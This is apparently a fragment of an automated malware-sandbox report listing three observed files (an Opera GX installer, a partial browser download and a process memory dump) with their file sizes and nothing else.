                                                                                                              • C:\Users\Admin\Downloads\OperaGXSetup.exe

                                                                                                                Filesize

                                                                                                                3.1MB

                                                                                                              • C:\Users\Admin\Downloads\Unconfirmed 905431.crdownload

                                                                                                                Filesize

                                                                                                                89KB

                                                                                                              • memory/1616-2089-0x00000237E1480000-0x00000237E14A2000-memory.dmp

                                                                                                                Filesize

                                                                                                                136KB